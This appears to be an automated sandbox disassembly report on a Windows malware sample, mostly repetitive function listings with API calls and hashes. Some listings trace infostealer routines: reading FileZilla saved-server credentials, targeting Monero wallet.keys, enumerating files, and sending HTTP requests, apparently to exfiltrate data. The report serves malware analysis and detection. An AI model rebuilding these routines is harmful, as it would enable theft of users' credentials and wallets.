                        • API ID:
                        • String ID: 2Eog$S|l{
                        • API String ID: 0-1362167614
                        • Opcode ID: 86e6f25168ecf9cf4af30dea0f15e5ba117ae0d506a0434defbec09c7e75f9a8
                        • Instruction ID: 588065f7a627f24aab1e7c795a51be1d963d77c5b3108f422b702a3f190eaaab
                        • Opcode Fuzzy Hash: 86e6f25168ecf9cf4af30dea0f15e5ba117ae0d506a0434defbec09c7e75f9a8
                        • Instruction Fuzzy Hash: 6452F4F3A0C2149FE304AF29EC8566AFBE5EF94720F16493DEAC4C3344E63558458A97
                        Function 0069F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006B15B8,006B0D96), ref: 0069F71E
                        • StrCmpCA.SHLWAPI(?,006B15BC), ref: 0069F76F
                        • StrCmpCA.SHLWAPI(?,006B15C0), ref: 0069F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0069FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0069FAC3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 33a500b65204339e4dedddf0f5430e980a90c8e31464113818fa859265fd54b8
                        • Instruction ID: cb51aedcdeded0f3f6c7c3bd93384cd0512cf9a75ef626d824e78670e7e51ee8
                        • Opcode Fuzzy Hash: 33a500b65204339e4dedddf0f5430e980a90c8e31464113818fa859265fd54b8
                        • Instruction Fuzzy Hash: 2111A57180010DABDB94FBE0DC559EE737AAF12300F5142AEA51B56492EF342F4ACF56
                        Function 009E6A56 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: G>?w
                        • API String ID: 0-2681059745
                        • Opcode ID: a550cf64bd68b1e41eb60700b055cea33aa36c3e3cc0c3ed5a8a5603318e7199
                        • Instruction ID: e72b21a780c8002209f11f7a58c5ea1ef52b8ae706911c81c72f164788e72801
                        • Opcode Fuzzy Hash: a550cf64bd68b1e41eb60700b055cea33aa36c3e3cc0c3ed5a8a5603318e7199
                        • Instruction Fuzzy Hash: 6B61E5F3D086109FE3046E29DC8577AFBD6EB94320F17063DDAD897784E93558448786
                        Function 00B05DC6 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 6ey~
                        • API String ID: 0-4082691886
                        • Opcode ID: 1d5a3ed9320b4f14cd4cc88a7a267063729e64255a817b1fe4eca3af5876770e
                        • Instruction ID: c5b42157c50e7ab893f8dfaf2d447e20dde5274bf1741bb0a547e8a143b7df59
                        • Opcode Fuzzy Hash: 1d5a3ed9320b4f14cd4cc88a7a267063729e64255a817b1fe4eca3af5876770e
                        • Instruction Fuzzy Hash: 2551D3B250CA01DBD3146E18DCC563FBFE9EB64700F26487D96C287B84E6355A509F83
                        Function 00A0E507 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Uk=w
                        • API String ID: 0-1033676908
                        • Opcode ID: 5415831277d145fc74631c866e4a11d6c09070bc90e56dab596c070db33546ed
                        • Instruction ID: dace6f2390d2a5368b92f8795b676b1af868452ef9b18c07b7a2cb81204f69be
                        • Opcode Fuzzy Hash: 5415831277d145fc74631c866e4a11d6c09070bc90e56dab596c070db33546ed
                        • Instruction Fuzzy Hash: 60413DA3F043185FE3446D7DED44777B78A97D0260F1B463ED948D7744E97A5C064282
                        Function 0091B319 Relevance: .2, Instructions: 231COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4a95e3c5834afbdec105bf464d15ccb4601b658514b58447f22752c1cb5c00e4
                        • Instruction ID: e7ab9b11fde895958342fd77aecab11d7e0de23a44fc133172d968bb07fac593
                        • Opcode Fuzzy Hash: 4a95e3c5834afbdec105bf464d15ccb4601b658514b58447f22752c1cb5c00e4
                        • Instruction Fuzzy Hash: 6671FAF3A186105FE3089A2DDC9577AB7D5EFD8320F1B493DE6C9C7380E93558058692
                        Function 0095D66F Relevance: .2, Instructions: 154COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79bf4d642726bc3a562d9472627f8836d016938b7a37a8f2d9ff225c09bea299
                        • Instruction ID: 35fe1a2abdd0b6b415d77d221c82386b22fc3c0547e0c6eef4ec72fb1449d46a
                        • Opcode Fuzzy Hash: 79bf4d642726bc3a562d9472627f8836d016938b7a37a8f2d9ff225c09bea299
                        • Instruction Fuzzy Hash: 1D4119F3A082045BF314AD2ADC4573BBBDBDBD4320F2A853DDA8497784F93558064296
                        Function 009AD86F Relevance: .1, Instructions: 117COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 97bcea0aab9705f1c70e7294a83d9ffa9f24a0a55d9ab2f5ccdb4d066d1f6f77
                        • Instruction ID: ccefa94afc5fc48fc899030a918093879c349639265a655b0abef49da0f76057
                        • Opcode Fuzzy Hash: 97bcea0aab9705f1c70e7294a83d9ffa9f24a0a55d9ab2f5ccdb4d066d1f6f77
                        • Instruction Fuzzy Hash: AE418BB220C7009FE3446E29EC8577AF7EAEFD4720F1A883EE2C4C7640DA7554858B56
                        Function 006A9750 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        Function 006A0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
                          • Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
                          • Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
                          • Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,0069148F,00000000), ref: 00699A5A
                          • Part of subcall function 006999C0: LocalFree.KERNEL32(0069148F), ref: 00699A90
                          • Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A
                          • Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,006B0DBA,006B0DB7,006B0DB6,006B0DB3), ref: 006A0362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A0369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 006A0385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 006A03CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A03DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 006A0419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006A0463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 006A0562
                        • lstrcat.KERNEL32(?,profile: null), ref: 006A0571
                        • lstrcat.KERNEL32(?,url: ), ref: 006A0580
                        • lstrcat.KERNEL32(?,00000000), ref: 006A0593
                        • lstrcat.KERNEL32(?,006B1678), ref: 006A05A2
                        • lstrcat.KERNEL32(?,00000000), ref: 006A05B5
                        • lstrcat.KERNEL32(?,006B167C), ref: 006A05C4
                        • lstrcat.KERNEL32(?,login: ), ref: 006A05D3
                        • lstrcat.KERNEL32(?,00000000), ref: 006A05E6
                        • lstrcat.KERNEL32(?,006B1688), ref: 006A05F5
                        • lstrcat.KERNEL32(?,password: ), ref: 006A0604
                        • lstrcat.KERNEL32(?,00000000), ref: 006A0617
                        • lstrcat.KERNEL32(?,006B1698), ref: 006A0626
                        • lstrcat.KERNEL32(?,006B169C), ref: 006A0635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 2910d9433888e72e7d36e28cbebe697186cf5d49bcaddf3cc4e69864fbcdccb1
                        • Instruction ID: 7bda882ed5ab6ef92d4b28351467c3d935340bc35968620065f59815a243f3e1
                        • Opcode Fuzzy Hash: 2910d9433888e72e7d36e28cbebe697186cf5d49bcaddf3cc4e69864fbcdccb1
                        • Instruction Fuzzy Hash: E5D11BB1900108ABDB84FBE4DD96EEE777ABF19300F50451AF502A6091EF34AE46CF65
                        Function 00695960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 006947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
                          • Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006959F8
                        • StrCmpCA.SHLWAPI(?,0126FA00), ref: 00695A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00695B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0126F9B0,00000000,?,0126B708,00000000,?,006B1A1C), ref: 00695E71
                        • lstrlen.KERNEL32(00000000), ref: 00695E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00695E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00695E9A
                        • lstrlen.KERNEL32(00000000), ref: 00695EAF
                        • lstrlen.KERNEL32(00000000), ref: 00695ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00695EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 00695F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00695F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00695F4C
                        • InternetCloseHandle.WININET(00000000), ref: 00695FB0
                        • InternetCloseHandle.WININET(00000000), ref: 00695FBD
                        • HttpOpenRequestA.WININET(00000000,0126FA50,?,0126F1C0,00000000,00000000,00400100,00000000), ref: 00695BF8
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
